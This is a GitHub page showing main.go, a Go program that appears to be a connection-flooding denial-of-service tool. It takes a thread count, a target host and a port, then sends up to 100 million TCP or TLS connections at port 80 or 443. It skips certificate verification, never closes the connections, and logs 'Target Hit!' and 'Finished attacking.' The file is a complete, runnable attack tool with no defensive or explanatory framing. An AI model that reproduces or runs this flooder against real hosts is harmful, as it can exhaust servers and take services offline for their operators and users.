-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.go
117 lines (97 loc) · 2.48 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
package main
import (
"os"
"log"
str "strconv"
"net"
"fmt"
"crypto/tls"
)
var (
workers int
target string
port int
)
const (
jobCount = 100_000_000 // AMOUNT of requests to send.
)
func init() {
parseArgs(&workers, &target, &port)
}
func httpAttackWorker(workerID int, jobs chan int, result chan int) {
switch port {
case 80:
for job := range jobs {
address := target + ":" + str.Itoa(port)
_, err := net.Dial("tcp", address)
if err != nil {
log.Printf("Worker: %d - Bad response from target! - %d \n", workerID, job)
result <- 0
continue
}
log.Printf("Worker: %d - Job:%d - Target Hit! \n", workerID, job)
result <- 1
}
case 443:
config := &tls.Config{ InsecureSkipVerify: true, }
for job := range jobs {
address := target + ":" + str.Itoa(port)
_, err := tls.Dial("tcp", address, config)
if err != nil {
log.Printf("Worker: %d - Bad response from target! - %d \n", workerID, job)
result <- 0
continue
}
log.Printf("Worker: %d - Job:%d - Target Hit! \n", workerID, job)
result <- 1
}
default:
fmt.Println("Invalid port number entered.")
os.Exit(1)
}
}
func parseArgs(workers *int, target *string, port *int) {
if len(os.Args) < 4 {
log.Println("Not enough parameters passed. ")
fmt.Println("Usage: go run main.go <threads> <target> <port>")
os.Exit(1)
}
if _, err := str.Atoi(os.Args[1]); err != nil {
log.Println("Thread must be a number")
fmt.Println("Usage: go run main.go <threads> <target> <port>")
os.Exit(1)
}
if _, err := str.Atoi(os.Args[3]); err != nil {
log.Println("Port must be a number")
fmt.Println("Usage: go run main.go <threads> <target> <port>")
os.Exit(1)
}
// On succesful conversion, set worker count
*workers,_ = str.Atoi(os.Args[1])
*target = os.Args[2]
*port,_ = str.Atoi(os.Args[3])
}
func sendJobsToWorkers(jobCount int, jobs chan int){
for j := 0; j <= jobCount; j++ {
jobs <- j
}
log.Println("Jobs placed in buff3r.")
close(jobs)
}
func startWorkers(workers int, jobs, results chan int) {
for w := 1; w < workers; w++ {
go httpAttackWorker(w, jobs, results)
}
}
func main() {
jobs := make(chan int, jobCount)
results := make(chan int, jobCount)
go startWorkers(workers, jobs, results)
go sendJobsToWorkers(jobCount, jobs)
// - Blocks till jobs finished.
for r := 1; r < jobCount; r++ {
<-results
}
close(results)
log.Println("Finished attacking. Workers put to sleep... ")
}